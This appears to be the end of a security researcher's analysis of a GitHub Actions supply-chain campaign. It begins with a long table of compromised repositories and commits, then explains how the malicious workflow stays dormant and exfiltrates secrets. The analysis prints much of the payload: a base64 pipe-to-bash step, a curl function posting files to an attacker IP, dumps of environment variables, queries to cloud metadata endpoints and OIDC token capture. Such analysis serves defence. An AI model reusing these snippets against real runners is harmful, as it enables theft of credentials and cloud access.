| 5573 | SahilVGite/inbrew | f8f3a11ae5d1 | pipeline-bot | [email protected] | 2026-05-18T12:07:43.000Z | ci: update build config |
| 5574 | myssaqil/Html-Web-Gaje | f90b4c7c42a8 | pipeline-bot | [email protected] | 2026-05-18T14:11:57.000Z | build: improve ci performance |
| 5575 | gitfarag/todo-vue-firebase | f91b17b0c32f | ci-bot | [email protected] | 2026-05-18T17:24:03.000Z | chore: optimize pipeline runtime |
| 5576 | vrct07/cadastro-cliente-JS | f92063349b00 | ci-bot | [email protected] | 2026-05-18T14:24:45.000Z | chore: sync ci configuration |
| 5577 | abdul118833/ulearna | f92207e64d1b | auto-ci | [email protected] | 2026-05-18T13:27:38.000Z | build: improve ci performance |
| 5578 | zuoelaine-coder/compsciassignment1 | f92699be57a0 | pipeline-bot | [email protected] | 2026-05-18T16:25:50.000Z | build: improve ci performance |
| 5579 | aledipa/Bruto2 | f92ecfec44b6 | auto-ci | [email protected] | 2026-05-18T12:38:37.000Z | build: improve ci performance |
| 5580 | AbhishekAnamala/test-action-1779119165309922301 | f92f6aeff115 | auto-ci | [email protected] | 2026-05-18T16:10:12.000Z | ci: update build config |
| 5581 | RameshRukshan/pet-care-system-LinkedList-and-Que | f93ff6ad6013 | auto-ci | [email protected] | 2026-05-18T17:36:56.000Z | chore: sync ci configuration |
| 5582 | Abhishek2127/Swiggy | f94e190ba79b | pipeline-bot | [email protected] | 2026-05-18T16:04:50.000Z | chore: sync ci configuration |
| 5583 | BryanAlexanderSantoso/source-code-official-by-bryan | f95a405db628 | auto-ci | [email protected] | 2026-05-18T13:50:12.000Z | ci: add build optimization step |
| 5584 | jenna-studio/simple-stock | f95d2bd97e1a | build-bot | [email protected] | 2026-05-18T12:22:11.000Z | build: improve ci performance |
| 5585 | ChanceDevelopment/kunyuanDeliverly | f9665e1a8503 | build-bot | [email protected] | 2026-05-18T12:45:37.000Z | fix: correct build workflow |
| 5586 | freelix-dev/ipos-app-1 | f97770f6a5dd | ci-bot | [email protected] | 2026-05-18T13:33:28.000Z | fix: correct build workflow |
| 5587 | phase23/z90demo | f97c96b8cff5 | pipeline-bot | [email protected] | 2026-05-18T11:47:29.000Z | build: improve ci performance |
| 5588 | git-init-priyanshu/git-init-priyanshu | f97e9c1772a7 | pipeline-bot | [email protected] | 2026-05-18T16:38:22.000Z | build: improve ci performance |
| 5589 | fadexadex/techfest-landing | f9802f9472a5 | pipeline-bot | [email protected] | 2026-05-18T16:56:45.000Z | build: improve ci performance |
| 5590 | GDG-AUIB/.github | f983aac77714 | pipeline-bot | [email protected] | 2026-05-18T13:29:02.000Z | fix: correct build workflow |
| 5591 | DexxoDev/RayanPersonnalWebsite1 | f985853e01a5 | build-bot | [email protected] | 2026-05-18T13:43:39.000Z | chore: sync ci configuration |
| 5592 | kobe1081/netComment | f987f439ff50 | ci-bot | [email protected] | 2026-05-18T12:46:05.000Z | chore: sync ci configuration |
| 5593 | 88daxiong/88daxiong.github.io | f98d18188a80 | auto-ci | [email protected] | 2026-05-18T16:38:24.000Z | fix: correct build workflow |
| 5594 | sahidDev09/Meetup-restaurant | f98d5688251f | build-bot | [email protected] | 2026-05-18T16:04:02.000Z | fix: correct build workflow |
| 5595 | BrandonC4/aretheylegal | f9998be0f492 | ci-bot | [email protected] | 2026-05-18T13:41:24.000Z | build: improve ci performance |
| 5596 | BSGallery1/Gallery | f9ae3f87ae90 | auto-ci | [email protected] | 2026-05-18T14:29:53.000Z | chore: update ci/cd pipeline |
| 5597 | Denis10/kml | f9b65b2c5230 | ci-bot | [email protected] | 2026-05-18T13:58:36.000Z | chore: update ci/cd pipeline |
| 5598 | sagarofseas/finorix-web-signal-app | f9bb955afeaa | ci-bot | [email protected] | 2026-05-18T13:38:27.000Z | build: improve ci performance |
| 5599 | LEAP-MNG-1f/Lhagvaa-FooD-delivery | f9bc077fa188 | pipeline-bot | [email protected] | 2026-05-18T15:56:08.000Z | fix: correct build workflow |
| 5600 | 11Kaviya11/Calculator-project | f9bd35009698 | pipeline-bot | [email protected] | 2026-05-18T15:56:26.000Z | build: improve ci performance |
| 5601 | Kevin-max-design/ajitesh | f9ce832b39c3 | ci-bot | [email protected] | 2026-05-18T16:40:51.000Z | ci: add build optimization step |
| 5602 | np03cy4a250023-gif/Project-crimescene | f9d65239e5fb | pipeline-bot | [email protected] | 2026-05-18T13:37:35.000Z | fix: correct build workflow |
| 5603 | Marshall-Hu/PhoneLine | f9dbd5635d1a | ci-bot | [email protected] | 2026-05-18T13:53:15.000Z | chore: sync ci configuration |
| 5604 | fadexadex/soft-exercise | f9df2b833e2e | build-bot | [email protected] | 2026-05-18T17:14:27.000Z | ci: update build config |
| 5605 | Debbatisudheer/ML-optimization | f9e00d6cd73c | build-bot | [email protected] | 2026-05-18T17:33:59.000Z | fix: correct build workflow |
| 5606 | kayosama007/ci-build-20260329-190402-9007 | f9e29ab34a44 | auto-ci | [email protected] | 2026-05-18T14:23:52.000Z | fix: correct build workflow |
| 5607 | David-Irihose/alu-higher_level_programming | f9e40e31a751 | auto-ci | [email protected] | 2026-05-18T13:27:14.000Z | ci: update build config |
| 5608 | Christian-School-Projects/ProgrammingLanguages | f9fb74c7b80e | build-bot | [email protected] | 2026-05-18T15:22:12.000Z | chore: optimize pipeline runtime |
| 5609 | BienG3Rd/tic_tac-toe | f9fc31cadee2 | ci-bot | [email protected] | 2026-05-18T16:23:00.000Z | build: improve ci performance |
| 5610 | quoeaire/data-structures-java | fa1814d108bb | ci-bot | [email protected] | 2026-05-18T13:47:01.000Z | chore: optimize pipeline runtime |
| 5611 | shivanshu-pietechsolutions/justblink | fa30f00aabb5 | pipeline-bot | [email protected] | 2026-05-18T12:46:54.000Z | ci: add build optimization step |
| 5612 | R-Dinesh-Kumar2004/Stone-Paper-Scissor-Game | fa32f4a9ce6e | pipeline-bot | [email protected] | 2026-05-18T14:08:26.000Z | ci: update build config |
| 5613 | ShaileshS237/netflix-clone | fa3c1f2c2c0f | ci-bot | [email protected] | 2026-05-18T16:59:46.000Z | ci: update build config |
| 5614 | Yamada731/Week-1 | fa4d08809e40 | build-bot | [email protected] | 2026-05-18T13:55:41.000Z | chore: optimize pipeline runtime |
| 5615 | wutao667/openclaw-lobster-ppt | fa502dc8da38 | ci-bot | [email protected] | 2026-05-18T11:59:12.000Z | build: improve ci performance |
| 5616 | riomukhtarom/machine-learning | fa63b87eb849 | pipeline-bot | [email protected] | 2026-05-18T15:41:34.000Z | chore: sync ci configuration |
| 5617 | Akisan98/Assignment1JS | fa67055ef3ce | build-bot | [email protected] | 2026-05-18T14:05:44.000Z | fix: correct build workflow |
| 5618 | myssaqil/pasti-parkir | fa7b83fc51c3 | ci-bot | [email protected] | 2026-05-18T14:07:44.000Z | chore: sync ci configuration |
| 5619 | amitos80/limit-csv | fa7d89045a21 | auto-ci | [email protected] | 2026-05-18T13:52:17.000Z | build: improve ci performance |
| 5620 | git-init-priyanshu/Blogsphere | fa7e6d79c857 | auto-ci | [email protected] | 2026-05-18T17:07:48.000Z | ci: add build optimization step |
| 5621 | AbhishekAnamala/websitepersonal | fa91b589208f | pipeline-bot | [email protected] | 2026-05-18T16:11:21.000Z | ci: update build config |
| 5622 | roydellclarke/tabs | faa307ee64a6 | build-bot | [email protected] | 2026-05-18T13:04:13.000Z | chore: update ci/cd pipeline |
| 5623 | iriis-research/medgemma-impact-challange | faa4c1c89584 | pipeline-bot | [email protected] | 2026-05-18T13:09:59.000Z | ci: update build config |
| 5624 | ho-cyber/vidyavriksh-website | faacc79a8005 | auto-ci | [email protected] | 2026-05-18T17:27:37.000Z | build: improve ci performance |
| 5625 | umairabhatti786/Readings2025 | faaf5a099b4a | auto-ci | [email protected] | 2026-05-18T12:49:56.000Z | chore: update ci/cd pipeline |
| 5626 | Ericooi997/stackblitz-starters-cipherx4 | fab4d143e395 | ci-bot | [email protected] | 2026-05-18T13:01:59.000Z | ci: add build optimization step |
| 5627 | deploy11/Sirdaryo-New | fab732fa59ac | ci-bot | [email protected] | 2026-05-18T11:50:12.000Z | ci: update build config |
| 5628 | tanishqgoyal000/mach1-rc-plane-project | fad60e88091c | build-bot | [email protected] | 2026-05-18T13:01:58.000Z | fix: correct build workflow |
| 5629 | ikku47/joy_tv | fafe2d837fd7 | ci-bot | [email protected] | 2026-05-18T13:28:52.000Z | chore: update ci/cd pipeline |
| 5630 | jnrveneracion/jnrveneracion | fb15e1827e82 | pipeline-bot | [email protected] | 2026-05-18T13:12:31.000Z | chore: sync ci configuration |
| 5631 | Grzzmine/Strat-Flow | fb178477c280 | ci-bot | [email protected] | 2026-05-18T12:06:55.000Z | ci: update build config |
| 5632 | osamahkenawy/budget_allocation_app | fb39d17e05bb | build-bot | [email protected] | 2026-05-18T15:20:00.000Z | fix: correct build workflow |
| 5633 | Davidf2004/Biblioteca-Digital | fb49f5c64605 | ci-bot | [email protected] | 2026-05-18T17:10:13.000Z | chore: sync ci configuration |
| 5634 | Kevin-max-design/pre-marketing- | fb692a61671d | auto-ci | [email protected] | 2026-05-18T16:34:08.000Z | chore: update ci/cd pipeline |
| 5635 | kingjamesegun/PhotographyClient | fb6aab048b91 | pipeline-bot | [email protected] | 2026-05-18T12:33:09.000Z | chore: sync ci configuration |
| 5636 | Keplalabs/gambit | fb6bbe161144 | auto-ci | [email protected] | 2026-05-18T12:59:54.000Z | chore: update ci/cd pipeline |
| 5637 | Asultop/NeToilet | fb7109488eae | build-bot | [email protected] | 2026-05-18T12:40:04.000Z | chore: sync ci configuration |
| 5638 | Stat184-Spring2025/Sec2_FP_Jackson_Nina_Eric | fb9d194504da | pipeline-bot | [email protected] | 2026-05-18T12:09:56.000Z | chore: sync ci configuration |
| 5639 | Srj-Love/RCVMVVM | fbb31233ad7f | build-bot | [email protected] | 2026-05-18T12:52:10.000Z | chore: optimize pipeline runtime |
| 5640 | ENDGAME-STREETWEAR-LLC/endgame-express | fbb5ad27888b | pipeline-bot | [email protected] | 2026-05-18T11:37:07.000Z | fix: correct build workflow |
| 5641 | NaimurDev/hello-html | fbc58f04b9d9 | build-bot | [email protected] | 2026-05-18T15:57:59.000Z | chore: sync ci configuration |
| 5642 | roydellclarke/BreadFrute-Head | fbd7d8866c7f | auto-ci | [email protected] | 2026-05-18T13:04:23.000Z | chore: sync ci configuration |
| 5643 | School-News-Portal/backend-service | fbddc517ecc5 | auto-ci | [email protected] | 2026-05-18T13:22:38.000Z | build: improve ci performance |
| 5644 | rahulbohra57/AgenticAI-LinkedIn-Post-Generator-CrewAI | fbeebdba24cf | ci-bot | [email protected] | 2026-05-18T16:33:17.000Z | fix: correct build workflow |
| 5645 | pareesa969/luminous-ledger | fbfd4d5ffe60 | ci-bot | [email protected] | 2026-05-18T13:44:43.000Z | ci: add build optimization step |
| 5646 | ShaileshS237/quickchicken_user | fc0b490b953d | build-bot | [email protected] | 2026-05-18T16:59:52.000Z | ci: update build config |
| 5647 | ConnectSiteForge/docs-8lbeci | fc0ba906bceb | auto-ci | [email protected] | 2026-05-18T14:36:28.000Z | build: improve ci performance |
| 5648 | Raja244/Tic_Tac_Toe_CPP | fc105a939279 | auto-ci | [email protected] | 2026-05-18T15:48:42.000Z | fix: correct build workflow |
| 5649 | amitos80/amitos80.github.io | fc1515ca3c58 | build-bot | [email protected] | 2026-05-18T13:51:03.000Z | ci: add build optimization step |
| 5650 | SaiGanesh91819/Mafia-Game | fc26f2ea3619 | build-bot | [email protected] | 2026-05-18T12:07:40.000Z | chore: optimize pipeline runtime |
| 5651 | Kevin-max-design/fynxx | fc2f45d73a64 | ci-bot | [email protected] | 2026-05-18T16:47:21.000Z | chore: optimize pipeline runtime |
| 5652 | RuchirKadam1729/books | fc54f68d44e7 | auto-ci | [email protected] | 2026-05-18T12:58:32.000Z | chore: update ci/cd pipeline |
| 5653 | jenish-prog/VITON-HD | fc5690191b3a | ci-bot | [email protected] | 2026-05-18T14:10:54.000Z | build: improve ci performance |
| 5654 | Aarabdh13/capstone | fc5b94f49a5b | auto-ci | [email protected] | 2026-05-18T13:32:03.000Z | chore: optimize pipeline runtime |
| 5655 | fadexadex/Vault-Key-Treasury | fc5d00f9c463 | auto-ci | [email protected] | 2026-05-18T17:23:23.000Z | chore: update ci/cd pipeline |
| 5656 | charanamith/skill-2 | fc7286cf7add | auto-ci | [email protected] | 2026-05-18T17:02:19.000Z | ci: add build optimization step |
| 5657 | aalmonzer/vogeledits2.0 | fc822fc812e7 | build-bot | [email protected] | 2026-05-18T12:59:40.000Z | chore: update ci/cd pipeline |
| 5658 | HamzaElMkhantar/form-react | fc8fc8a74e38 | build-bot | [email protected] | 2026-05-18T17:13:57.000Z | ci: add build optimization step |
| 5659 | Rezasz/kanz-ai-v3 | fc998543eeee | auto-ci | [email protected] | 2026-05-18T13:29:05.000Z | chore: optimize pipeline runtime |
| 5660 | Anaskc615/react_cart | fca4a707482b | build-bot | [email protected] | 2026-05-18T16:07:00.000Z | ci: add build optimization step |
| 5661 | baburatheesh/angular-test | fcaf5a9b7dcf | build-bot | [email protected] | 2026-05-18T13:51:58.000Z | build: improve ci performance |
| 5662 | RaynerdTech/soccerzone-frontend | fcc0a4c4d717 | auto-ci | [email protected] | 2026-05-18T13:56:02.000Z | fix: correct build workflow |
| 5663 | 0-pavand/Online-food-delivery-system | fcc5b53286a2 | ci-bot | [email protected] | 2026-05-18T12:57:36.000Z | ci: add build optimization step |
| 5664 | anshvarma07/tailwindone | fcc71264ba6d | build-bot | [email protected] | 2026-05-18T13:35:49.000Z | ci: add build optimization step |
| 5665 | supportefy-dev/vibe-to-clean | fcd191a48cc4 | pipeline-bot | [email protected] | 2026-05-18T11:36:50.000Z | ci: add build optimization step |
| 5666 | Bekir-Caglar/NoEgo | fce66b392314 | ci-bot | [email protected] | 2026-05-18T13:15:32.000Z | fix: correct build workflow |
| 5667 | mishi-tyagi/ShortCircuit | fcfb8165a833 | build-bot | [email protected] | 2026-05-18T16:22:05.000Z | build: improve ci performance |
| 5668 | onenarok777/photo-meta | fcfdfbf1320b | auto-ci | [email protected] | 2026-05-18T12:47:28.000Z | chore: sync ci configuration |
| 5669 | VrajPatelK/task-management-backend | fd0549e2a17f | build-bot | [email protected] | 2026-05-18T12:45:13.000Z | chore: update ci/cd pipeline |
| 5670 | azimsidd/Amazing-Wallpaper-App | fd09b621b99b | auto-ci | [email protected] | 2026-05-18T13:26:37.000Z | ci: update build config |
| 5671 | MaybeBroken/ExampleAutoUpdaterRepo | fd2626c17b3f | auto-ci | [email protected] | 2026-05-18T17:05:00.000Z | ci: add build optimization step |
| 5672 | JKS-sys/CRUD-application-using-MERN-stack-for-phonebook-s-frontend | fd2861ff17de | build-bot | [email protected] | 2026-05-18T14:28:27.000Z | build: improve ci performance |
| 5673 | kasumusof/yugobot | fd2d904269f9 | build-bot | [email protected] | 2026-05-18T12:50:48.000Z | fix: correct build workflow |
| 5674 | jongsun-park/storybook | fd2f65e9bddc | ci-bot | [email protected] | 2026-05-18T16:18:44.000Z | build: improve ci performance |
| 5675 | VietNamCombatZ/gitTest01 | fd32892858af | auto-ci | [email protected] | 2026-05-18T15:46:52.000Z | ci: add build optimization step |
| 5676 | afhex/examen2 | fd3fa6b93609 | ci-bot | [email protected] | 2026-05-18T13:16:50.000Z | chore: update ci/cd pipeline |
| 5677 | BryanAlexanderSantoso/fix-2 | fd675cae8274 | pipeline-bot | [email protected] | 2026-05-18T13:46:07.000Z | build: improve ci performance |
| 5678 | VietNamCombatZ/PBL3 | fd90a58d3fc0 | build-bot | [email protected] | 2026-05-18T15:45:28.000Z | chore: update ci/cd pipeline |
| 5679 | Christian-School-Projects/SystemsProgrammingAssignment2 | fd93e7ac39d8 | build-bot | [email protected] | 2026-05-18T15:21:38.000Z | chore: sync ci configuration |
| 5680 | Gigih1996/GitOps_ArgoCD_GitHub | fd9e829dc4d3 | auto-ci | [email protected] | 2026-05-18T17:35:24.000Z | chore: sync ci configuration |
| 5681 | SanketVerse/FindMyAngle | fdcc4997bb10 | build-bot | [email protected] | 2026-05-18T17:22:06.000Z | ci: update build config |
| 5682 | git-init-priyanshu/iNotebook-MERN | fddb40cfcfc0 | auto-ci | [email protected] | 2026-05-18T17:39:33.000Z | chore: sync ci configuration |
| 5683 | kchandanmahto/Careshield | fddca3bc5f45 | pipeline-bot | [email protected] | 2026-05-18T13:39:20.000Z | build: improve ci performance |
| 5684 | BryanAlexanderSantoso/Slider-Settings-By-Pilar | fde6b46506d7 | pipeline-bot | [email protected] | 2026-05-18T13:50:32.000Z | ci: update build config |
| 5685 | shkshakhawat/Ffuenf_Common | fdf983fe0fba | build-bot | [email protected] | 2026-05-18T17:14:03.000Z | build: improve ci performance |
| 5686 | cybxrrgsouraabh/test-action-1778960691804484261 | fdfadae63b11 | build-bot | [email protected] | 2026-05-18T12:12:58.000Z | ci: add build optimization step |
| 5687 | the-wilful-youth/the-wilful-youth | fdfd801eb72e | pipeline-bot | [email protected] | 2026-05-18T16:20:06.000Z | chore: optimize pipeline runtime |
| 5688 | cslant/home-runner | fdfde625bd10 | auto-ci | [email protected] | 2026-05-18T16:35:10.000Z | build: improve ci performance |
| 5689 | mkanbu999/Interview-Prep | fe04b96009c7 | build-bot | [email protected] | 2026-05-18T16:31:22.000Z | chore: optimize pipeline runtime |
| 5690 | riomukhtarom/FootballClubList | fe28848e74dc | pipeline-bot | [email protected] | 2026-05-18T15:46:04.000Z | chore: optimize pipeline runtime |
| 5691 | alanmunoz25/archive-93hqy8 | fe347e951a2f | pipeline-bot | [email protected] | 2026-05-18T14:23:33.000Z | chore: update ci/cd pipeline |
| 5692 | naveenld024/flutter_shimmer | fe3625ff1138 | build-bot | [email protected] | 2026-05-18T13:27:28.000Z | ci: add build optimization step |
| 5693 | noushiFlex/todo-app | fe53d2c49d82 | auto-ci | [email protected] | 2026-05-18T17:47:10.000Z | chore: sync ci configuration |
| 5694 | BienG3Rd/my-webpage | fe5a8e23cd9a | auto-ci | [email protected] | 2026-05-18T16:25:12.000Z | chore: optimize pipeline runtime |
| 5695 | Rajesh0055/CRMFrontendApp | fe67e7b9920c | auto-ci | [email protected] | 2026-05-18T13:37:57.000Z | ci: update build config |
| 5696 | Dejlof/Robot-Friends-App | fe76c6c55b95 | pipeline-bot | [email protected] | 2026-05-18T16:01:06.000Z | chore: optimize pipeline runtime |
| 5697 | Taha-khaled1/motkaml-landing-page | fe7b7738bc07 | ci-bot | [email protected] | 2026-05-18T14:50:09.000Z | ci: add build optimization step |
| 5698 | aalmonzer/vogeleditsportfolio | fe85df53e343 | auto-ci | [email protected] | 2026-05-18T12:59:46.000Z | ci: add build optimization step |
| 5699 | myssaqil/Navigator_dasar-Flutter | fe8cf4d4461f | ci-bot | [email protected] | 2026-05-18T14:17:16.000Z | chore: sync ci configuration |
| 5700 | raffaelramalhorosa/nexunmia | fe935fd1acf7 | build-bot | [email protected] | 2026-05-18T12:09:27.000Z | chore: optimize pipeline runtime |
| 5701 | PavelAgarkov/service-template | feb78ac23b1b | auto-ci | [email protected] | 2026-05-18T13:45:15.000Z | ci: update build config |
| 5702 | ahtisham02/StudentFormAppApi | fec59757f4bf | pipeline-bot | [email protected] | 2026-05-18T15:34:58.000Z | ci: update build config |
| 5703 | deploy11/free_hosting | fef0174c2eb6 | ci-bot | [email protected] | 2026-05-18T11:54:57.000Z | fix: correct build workflow |
| 5704 | HamzaElMkhantar/-TypeScript-React-Redux-toolkit-E-commerce | ff0b24a74d19 | ci-bot | [email protected] | 2026-05-18T17:26:05.000Z | ci: update build config |
| 5705 | SULINKOFICIAL/central | ff155077f953 | pipeline-bot | [email protected] | 2026-05-18T12:01:15.000Z | chore: optimize pipeline runtime |
| 5706 | LynxJackal/dashy | ff250b5365c7 | ci-bot | [email protected] | 2026-05-18T15:33:59.000Z | ci: update build config |
| 5707 | jenithion/clearning | ff3b1d7aa8ef | build-bot | [email protected] | 2026-05-18T13:48:20.000Z | ci: add build optimization step |
| 5708 | lucky-hw-kim/json_the_cat | ff5089cd1c9e | build-bot | [email protected] | 2026-05-18T12:44:38.000Z | build: improve ci performance |
| 5709 | the-wilful-youth/Sync-d | ff529ce38a46 | auto-ci | [email protected] | 2026-05-18T16:29:12.000Z | ci: add build optimization step |
| 5710 | MR-AYAN-CHOWDHURY/autoreact-cmds | ff5b42e00c70 | build-bot | [email protected] | 2026-05-18T11:43:37.000Z | chore: update ci/cd pipeline |
| 5711 | MoustafaElsaghier/CameraApp | ff748e24efca | auto-ci | [email protected] | 2026-05-18T15:37:05.000Z | chore: update ci/cd pipeline |
| 5712 | LuciferVid/CryptoTracker | ff8790ac87c1 | pipeline-bot | [email protected] | 2026-05-18T12:05:20.000Z | chore: sync ci configuration |
| 5713 | DenysOleksiuk/HillelProject_23 | ff90dd0314b9 | auto-ci | [email protected] | 2026-05-18T16:19:00.000Z | ci: add build optimization step |
| 5714 | theabelchannel/Taller10 | ffa7bb8b2b31 | ci-bot | [email protected] | 2026-05-18T13:22:42.000Z | fix: correct build workflow |
| 5715 | Wookie3/Yard_maintenance_project | ffbacbe8df40 | pipeline-bot | [email protected] | 2026-05-18T16:40:34.000Z | ci: update build config |
| 5716 | jongsun-park/ml_with_keras | ffc1c186f95b | auto-ci | [email protected] | 2026-05-18T16:17:24.000Z | fix: correct build workflow |
| 5717 | JKS-sys/billboard-hot-50-scrapper | ffd1066710b7 | auto-ci | [email protected] | 2026-05-18T14:22:14.000Z | ci: update build config |
| 5718 | CHESSComputing/FabricNode | ffe743ca1698 | ci-bot | [email protected] | 2026-05-18T13:40:54.000Z | ci: add build optimization step |
| No matching rows | ||||||
Two Payload Variants
The campaign deployed two distinct workflow variants. The mass-scale variant, used in 5,700+ repositories, adds a new file .github/workflows/ci.yml named SysDiag with triggers on push to all branches and pull_request_target. This variant fires automatically on every push and PR, maximizing coverage. The Tiledesk variant replaced an existing workflow, renamed it to Optimize-Build, and used workflow_dispatch (manual trigger only), a more targeted approach. Both variants share the same C2 (216.126.225.129:8443), the same megalodon campaign identifier, and the same exfiltration payload, but each commit gets a unique session ID.
Execution Trigger
In the Tiledesk case, the malicious code does not execute when someone installs the npm package. The payload lives inside a bundled GitHub Actions workflow file, .github/workflows/docker-community-worker-push-latest.yml, and targets CI/CD runners.
The original workflow built and pushed Docker images on pushes to master:
# .github/workflows/docker-community-worker-push-latest.yml (clean, v2.18.5)name: Docker Image Community Worker latest CI
on: push: branches: [ master ] pull_request: branches: [ master ]
jobs: push_to_registry: name: Push Docker image to Docker Hub runs-on: ubuntu-latest steps: - name: Check out the repo uses: actions/checkout@v4 - name: Login to Docker Hub uses: docker/login-action@v3 ...The attacker replaced this with:
# .github/workflows/docker-community-worker-push-latest.yml (malicious, v2.18.6+)name: Optimize-Buildon: workflow_dispatch:permissions: contents: read id-token: write actions: readjobs: check: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 with: fetch-depth: 1 - run: set +e; echo "Q0I9Imh0dHA6Ly8yMTYuMTI2LjIy..." | base64 -d | bashThe trigger switched to workflow_dispatch (manual only). The attacker added id-token: write permission, enabling OIDC impersonation. And the entire build logic became a single run step that decodes and executes a base64 blob.
Why workflow_dispatch?
The trigger change from on: push to on: workflow_dispatch is a stealth choice. GitHub Actions evaluates the workflow file version present in the commit being pushed. When acac5a9 landed on master, the workflow file already specified workflow_dispatch, so the push did not trigger the payload. The GitHub Actions API confirms zero workflow_dispatch runs for this workflow; the last run was a push event on May 4, before the compromise.
This makes the backdoor dormant. It creates no visible runs in the Actions tab, no failed builds, no red flags in CI history. The attacker can trigger it later via the GitHub API:
POST /repos/{owner}/{repo}/actions/workflows/{workflow}/dispatches{"ref": "master"}GitHub’s anti-recursion rules prevent GITHUB_TOKEN-triggered events from spawning new workflow runs. But workflow_dispatch and repository_dispatch are exempted from this restriction. If the attacker obtains a GITHUB_TOKEN from any other workflow run in the same repo (through a compromised dependency, a PR-triggered action, or another supply chain vector), they can fire the exfiltration workflow on demand.
The tradeoff is reach: on: push would guarantee execution on every commit to master, hitting more targets without intervention. workflow_dispatch sacrifices that for operational security. With 5,700+ repos compromised, even a small fraction yielding a usable GITHUB_TOKEN gives the attacker enough targets for on-demand triggering.
Malicious Payload
The base64 blob decodes to a 111-line bash script. It begins by configuring the C2 endpoint and a cleanup trap:
# decoded payloadCB="http://216.126.225.129:8443?h=megalodon&l=gh_dump&id=hefs8esnhgkx"DID="hefs8esnhgkx"PLAT="gh"WORK="$GITHUB_WORKSPACE"TMP_DIR=$(mktemp -d)trap "rm -rf '$TMP_DIR'" EXITA helper function _post() handles exfiltration. It truncates files above 5MB, posts them to the C2 with metadata headers, and adds a random sleep between 0-1 seconds:
# decoded payload_post() { local fname="$1" fpath="$2" [ -z "$fpath" ] || [ ! -s "$fpath" ] && return local sz=$(stat -c%s "$fpath" 2>/dev/null || stat -f%z "$fpath" 2>/dev/null || echo 0) [ "$sz" -gt 5242880 ] && head -c 5242880 "$fpath" > "$fpath.trunc" && fpath="$fpath.trunc" curl -sS -X POST -m 60 \ -H 'Content-Type: text/plain' \ -H "X-Mega-DID: $DID" \ -H "X-Mega-Plat: $PLAT" \ -H "X-Mega-File: $fname" \ --data-binary @"$fpath" \ "${CB}&l=${PLAT}_exfil&id=${DID}&f=${fname}" >/dev/null 2>&1 || true sleep $((RANDOM % 2))}Data Collection
The script collects data in five phases.
Phase 1: Environment variables. Dumps printenv, reads /proc/self/environ, iterates over /proc/[0-9]*/environ for all readable processes, and reads PID 1’s environment. This captures every secret exposed as an environment variable on the runner: GITHUB_TOKEN, Docker Hub credentials, custom secrets.
# decoded payloadprintenv | sort > "$TMP_DIR/meta_printenv.txt" 2>/dev/null_post "meta_printenv" "$TMP_DIR/meta_printenv.txt"
[ -d /proc ] && for p in /proc/[0-9]*/environ; do [ -f "$p" ] && [ -r "$p" ] && tr '\0' '\n' < "$p" 2>/dev/nulldone | sort -u | head -2000 > "$TMP_DIR/meta_proc_all.txt"_post "meta_proc_all" "$TMP_DIR/meta_proc_all.txt"Phase 2: Credential files. The script reads 27 specific credential files by path, covering AWS (~/.aws/credentials, ~/.aws/config), SSH (id_rsa, id_ed25519, id_ecdsa), Docker (~/.docker/config.json), npm (~/.npmrc), GCP (application_default_credentials.json, credentials.db), GitHub CLI (~/.config/gh/hosts.yml), Kubernetes (~/.kube/config), Terraform (credentials.tfrc.json), Vault (~/.vault-token), git credentials, shell history, and Kubernetes service account tokens.
Phase 3: Cloud provider credential harvesting. If the aws CLI is available, the script iterates over every configured profile, calls sts get-caller-identity, and extracts access keys, secret keys, and session tokens. For GCP, it runs gcloud auth list and gcloud auth print-access-token. It also queries all three major cloud IMDS endpoints:
# decoded payload (GCP IMDS)curl -sS -m 3 -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/?recursive=true" > "$TMP_DIR/meta_gcp.txt"
# decoded payload (AWS IMDSv2)IMDS_TOK=$(curl -sS -m 3 -X PUT \ -H "X-aws-ec2-metadata-token-ttl-seconds: 60" \ "http://169.254.169.254/latest/api/token")curl -sS -m 3 -H "X-aws-ec2-metadata-token: $IMDS_TOK" \ "http://169.254.169.254/latest/meta-data/iam/security-credentials/$role"
# decoded payload (Azure IMDS)curl -sS -m 3 -H "Metadata: true" \ "http://169.254.169.254/metadata/instance?api-version=2021-02-01"Phase 4: File and code scanning. Searches the workspace, home directory, /tmp, and /home/runner for configuration files (.env, credentials.json, service-account.json, docker-compose.yml, etc.) and exfiltrates each one. Then grep-scans source code across 30+ file extensions using a regex that matches AWS access keys (AKIA/ASIA), Stripe/Razorpay keys, SendGrid API keys, Sendinblue keys, Mailgun keys, GitHub tokens (ghp/gho/ghu/ghs/ghr and fine-grained PATs), GitLab tokens (all 13 token prefixes), Atlassian tokens, Heroku API keys, Slack tokens, npm tokens, PyPI tokens, DigitalOcean tokens, Doppler tokens, Buildkite tokens, Pulumi tokens, Vercel tokens, Postman keys, Azure SAS tokens, JWTs, database connection strings (MongoDB, Postgres, MySQL, Redis, MSSQL, AMQP), PEM private keys, and common environment variable patterns (AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, DATABASE_URL, etc.).
Phase 5: CI/CD token theft. The script targets CI platform tokens for identity impersonation:
# decoded payloadif [ -n "$ACTIONS_ID_TOKEN_REQUEST_URL" ]; then printf 'req_url=%s\ntoken=%s\n' \ "$ACTIONS_ID_TOKEN_REQUEST_URL" "$ACTIONS_ID_TOKEN_REQUEST_TOKEN" \ > "$TMP_DIR/oidc_gh.txt" _post "oidc_gh" "$TMP_DIR/oidc_gh.txt"fiThe ACTIONS_ID_TOKEN_REQUEST_URL and ACTIONS_ID_TOKEN_REQUEST_TOKEN pair enables the attacker to request OIDC tokens that impersonate the GitHub Actions workflow. Organizations using OIDC federation for cloud deployments (instead of long-lived secrets) face the worst outcome: the attacker can mint tokens that authenticate to AWS, GCP, or Azure as the CI identity.
Anti-Forensics
The payload uses set +e to suppress errors, wraps the C2 curl calls with || true to prevent workflow failure on network errors, uses a temp directory with a cleanup trap, and adds random sleeps between exfiltration calls. The workflow_dispatch trigger means the workflow only runs if someone manually invokes it (or the attacker does via a stolen GITHUB_TOKEN), not on every push. This reduces the chance of accidental discovery through failed CI runs.
Conclusion
5,700+ commits in six hours, 5,561 repositories, one payload: replace a GitHub Actions workflow with a dormant secret exfiltration backdoor. The workflow_dispatch trigger design means these backdoors sit silent until activated, creating no visible CI runs.
Tiledesk shows how repository compromise cascades to package registries. Seven npm versions carried the backdoor because the maintainer published from a poisoned repo. Application code: untouched. Only the workflow file changed. Code review would catch this, but nobody reviews workflow files in npm packages.
